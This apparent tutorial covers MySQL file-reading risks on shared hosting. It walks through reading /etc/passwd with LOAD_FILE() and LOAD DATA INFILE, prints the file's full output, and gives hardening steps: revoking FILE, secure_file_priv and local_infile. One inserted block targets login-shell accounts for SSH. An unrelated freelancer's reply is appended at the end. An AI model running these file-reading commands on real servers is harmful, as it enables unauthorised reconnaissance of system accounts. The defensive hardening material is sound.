MySQL, as we know, is a very popular DBMS (Database Management System). It comes in four editions:
* MySQL Standard includes the standard storage engines as well as the InnoDB storage engine, which is touted as a "transaction-safe, ACID-compliant database" with some additional features over the standard engines.
* MySQL Pro is the commercial version.
* MySQL Max includes the more technologically advanced features that are available during early-access programs.
* MySQL Classic is the standard storage engine without the InnoDB engine. This is another commercial version.
To increase usability, the MySQL developers added some functions that put the server at risk. You have probably heard about local attack methods that go through MySQL. Let's try an example.
(In this example, assume the attacker owns a MySQL account on the server that can create, alter and drop databases and tables, and that holds the FILE privilege, the requirement explained below.)
The attacker creates a table and fills it with the content of a file:
USE attacker;
CREATE TABLE readfile (text LONGTEXT);
-- LOAD_FILE() reads the file with mysqld's own permissions and returns it as a string
INSERT INTO readfile VALUES (LOAD_FILE('/etc/passwd'));
Selecting from the table then shows the content of /etc/passwd:
SELECT * FROM readfile;
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
ident:x:100:101::/home/ident:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
canna:x:39:39:Canna Service User:/var/lib/canna:/sbin/nologin
wnn:x:49:49:Wnn Input Server:/var/lib/wnn:/sbin/nologin
mysql:x:101:102:MySQL server:/var/lib/mysql:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
Some may wonder: "Why could the attacker exploit my server although I hardened it carefully: safe_mode on, open_basedir set, system functions disabled?" The answer is that the administrator forgot, or did not care enough, about the database service. The problem here is that we need to look for the risk in MySQL's usability features from the customer's point of view (in case you are managing a shared-hosting environment):
"Do they really need those functions?"
"What could an attacker do once they have a MySQL account?"
You can find a solution and deploy it after answering these two questions. Let's have a look at MySQL's functions.
Which ones are the most dangerous?
First, consider load_file(). Its syntax is LOAD_FILE(file_name). It reads the content of a file and returns it as a string. In the MySQL manual you can see its requirements:
" To use this function, the file must be located on the server host, you must specify the full pathname to the file, and you must have the FILE privilege. The file must be readable by all and its size less than max_allowed_packet bytes. "
To read a file through MySQL, the user must have the FILE privilege, and the file must be readable by all. These are the two golden keys for us, poor sysadmins, to prevent the attack. A normal customer who needs to manipulate files has two ways to do it:
1. Through PHP, Perl, CGI, ASP, or the file manager in the hosting control panel
2. Directly through FTP
So a normal customer does not need the FILE privilege. To prevent this risk, simply revoke the FILE privilege from all users in MySQL. Note that FILE is a global privilege (granted ON *.*), so check the mysql.user table rather than per-database grants.
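The audit-and-revoke procedure described above, as an added example that is not part of the original article: it lists every account holding the global FILE privilege, revokes it from one of them, confirms that LOAD_FILE() is now blocked, and adds the server-side secure_file_priv restriction as defence in depth. The account name 'cust01'@'localhost' and the directory /var/lib/mysql-files are assumptions for illustration.

```sql
-- Added example (not from the original article). Account and path names
-- are hypothetical.

-- 1. Who can read files from the server host? Every row with
--    File_priv = 'Y' can use LOAD_FILE() and LOAD DATA INFILE against any
--    world-readable file that mysqld itself can open.
SELECT User, Host, File_priv
FROM   mysql.user
WHERE  File_priv = 'Y';

-- 2. FILE is a global privilege: it is granted and revoked ON *.*, never
--    per database. Revoke it from each customer account found above
--    (here the hypothetical shared-hosting user 'cust01'@'localhost').
--    Global privilege changes apply to the account's next connection, so
--    sessions that are already open keep FILE until they reconnect.
REVOKE FILE ON *.* FROM 'cust01'@'localhost';
SHOW GRANTS FOR 'cust01'@'localhost';

-- 3. Verify while connected as that account: without FILE, LOAD_FILE()
--    returns NULL rather than raising an error, so test for NULL instead
--    of expecting the statement to fail.
SELECT LOAD_FILE('/etc/passwd') IS NULL AS blocked;   -- blocked = 1

-- 4. Defence in depth: secure_file_priv confines LOAD_FILE(),
--    LOAD DATA INFILE and SELECT ... INTO OUTFILE to a single directory,
--    or disables them entirely when set to NULL (MySQL 5.7 and later).
--    It is read-only at runtime, so set it under [mysqld] in my.cnf and
--    restart the server:
--        secure_file_priv = /var/lib/mysql-files
--    Then confirm what the running server actually enforces:
SELECT @@GLOBAL.secure_file_priv;
```

Run steps 1, 2 and 4 as an administrative account and step 3 as the customer account: the NULL result from the customer's own session is the check that the revocation took effect.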
The next one is the LOAD DATA INFILE statement:
"LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE 'file_name'
[REPLACE | IGNORE]
INTO TABLE tbl_name
[FIELDS
[TERMINATED BY 'string']
[[OPTIONALLY] ENCLOSED BY 'char']
[ESCAPED BY 'char']
]
[LINES
[STARTING BY 'string']
[TERMINATED BY 'string']
]
[IGNORE number LINES]
[(col_name,...)] "
(This mini-article assumes you already know MySQL, so the use and syntax of the statement are not covered here.)
This does the same as load_file() but is faster. It also has one more keyword: LOCAL.
When LOCAL is specified, the file is read on the client and sent to the server. The vast majority of servers run MySQL on localhost (the same host as the application), so in practice it makes little difference whether LOCAL is present or not. Note, however, that the LOCAL form does not require the FILE privilege; it is controlled by the local_infile setting on the server and the client. Here is the requirement for the server-side form:
"For security reasons, when reading text files located on the server, the files must either reside in the database directory or be readable by all. Also, to use LOAD DATA INFILE on server files, you must have the FILE privilege "
Again, the FILE privilege is the key to preventing this risk.
Dumping files onto the server is not as common, so it is not discussed here.
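The same /etc/passwd read as above, done with LOAD DATA INFILE, as an added example that is not part of the original article. It goes slightly beyond the text: instead of loading the file into one LONGTEXT column it splits the file into one column per passwd field, so the attacker can query it directly, and it shows the LOCAL variant mentioned above together with the server setting that disables it. The database name attacker and table name passwd are assumptions for illustration.

```sql
-- Added example (not from the original article). Database and table
-- names are hypothetical. The server-side form needs the FILE privilege
-- and a file that mysqld can open (world-readable, or inside
-- secure_file_priv when that is set).

USE attacker;

-- One column per /etc/passwd field, so the result is queryable rather
-- than a single blob of text.
CREATE TABLE passwd (
  login VARCHAR(64),
  pw    VARCHAR(128),
  uid   INT,
  gid   INT,
  gecos VARCHAR(255),
  home  VARCHAR(255),
  shell VARCHAR(255)
);

-- Server-side read: mysqld itself opens /etc/passwd. ':' separates the
-- seven fields and '\n' separates records.
LOAD DATA INFILE '/etc/passwd'
  INTO TABLE passwd
  FIELDS TERMINATED BY ':'
  LINES  TERMINATED BY '\n'
  (login, pw, uid, gid, gecos, home, shell);

-- The attacker can now ask precise questions, for example which accounts
-- have a real login shell and are therefore worth targeting over SSH.
SELECT login, uid, home
FROM   passwd
WHERE  shell NOT IN ('/sbin/nologin', '/bin/false', '');

-- The LOCAL variant differs in one important way: the client process
-- opens the file and streams it to the server, so it runs with the
-- client's OS permissions and does NOT need the FILE privilege.
-- Revoking FILE alone does not stop it; it is gated by local_infile,
-- which must be enabled on both server and client.
-- LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE passwd
--   FIELDS TERMINATED BY ':' LINES TERMINATED BY '\n';

-- Harden: refuse LOCAL loads server-wide. This variable is dynamic, so
-- no restart is needed; add local_infile=0 under [mysqld] in my.cnf to
-- make it survive a restart.
SET GLOBAL local_infile = 0;
SELECT @@GLOBAL.local_infile;   -- 0
```

Run the CREATE and LOAD statements as the attacker's account to reproduce the read; run the SET GLOBAL as an administrative account and re-run the commented LOCAL statement to confirm it is refused.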
Conclusion:
MySQL is a really, really powerful DBMS because of its power, speed and usability, but its many unneeded functions make it a potential risk to the server. I hope you can take a little experience from this to improve security for yourself.
Hi. I am an experienced Linux/SQL system administrator. I will provide setup, tuning and further support. That's quite a nice article, but it doesn't explain what you want. If it is hardening your MySQL permissions, then it's OK to do that. Please provide the configuration details you need. Looking forward to hearing from you.
Regards, NK